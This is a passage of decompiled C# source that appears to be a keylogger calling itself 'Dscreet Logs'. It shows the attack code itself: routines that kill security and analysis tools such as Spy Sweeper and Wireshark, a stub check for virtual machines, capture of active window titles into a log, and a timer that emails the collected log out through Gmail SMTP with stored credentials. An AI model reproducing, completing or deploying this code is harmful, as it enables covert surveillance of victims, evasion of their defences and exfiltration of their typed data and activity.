|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "spysweeper.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public bool veeemchekmustang()
|
|||
|
{
|
|||
|
string userName = Environment.UserName;
|
|||
|
object[] objArray = new object[1]
|
|||
|
{
|
|||
|
(object) "SELECT * FROM Win32_VideoController"
|
|||
|
};
|
|||
|
if (new bool[1]{ true }[0])
|
|||
|
Conversions.ToString(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objArray[0]))), typeof (string)));
|
|||
|
bool flag;
|
|||
|
return flag;
|
|||
|
}
|
|||
|
|
|||
|
public void wyresharkehavok()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "wireshark", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private string GetActiveWindowTitle()
|
|||
|
{
|
|||
|
string lpString = new string(char.MinValue, 100);
|
|||
|
Form1.GetWindowText(Form1.GetForegroundWindow(), ref lpString, 100);
|
|||
|
return lpString.Substring(0, checked (Strings.InStr(lpString, "\0") - 1));
|
|||
|
}
|
|||
|
|
|||
|
private void Timer2_Tick(object sender, EventArgs e)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
new SmtpClient("smtp.gmail.com")
|
|||
|
{
|
|||
|
EnableSsl = true,
|
|||
|
Credentials = ((ICredentialsByHost) new NetworkCredential(this.Settings[1], this.Settings[2])),
|
|||
|
Port = 587
|
|||
|
}.Send(new MailMessage()
|
|||
|
{
|
|||
|
Subject = "[Dscreet Logs] - ",
|
|||
|
To = {
|
|||
|
this.Settings[1]
|
|||
|
},
|
|||
|
From = new MailAddress(this.Settings[1]),
|
|||
|
Body = this.TextBox1.Text
|
|||
|
});
|
|||
|
this.TextBox1.Clear();
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public string FileName(string FullPath) => Path.GetFileName(FullPath);
|
|||
|
|
|||
|
private void Timer1_Tick(object sender, EventArgs e)
|
|||
|
{
|
|||
|
if (Operators.CompareString(this.str1n, this.GetActiveWindowTitle(), false) == 0)
|
|||
|
return;
|
|||
|
this.TextBox1.Text = this.TextBox1.Text + "\r\n[-- " + this.GetActiveWindowTitle() + " --]\r\n";
|
|||
|
this.str1n = this.GetActiveWindowTitle();
|
|||
|
}
|
|||
|
}
|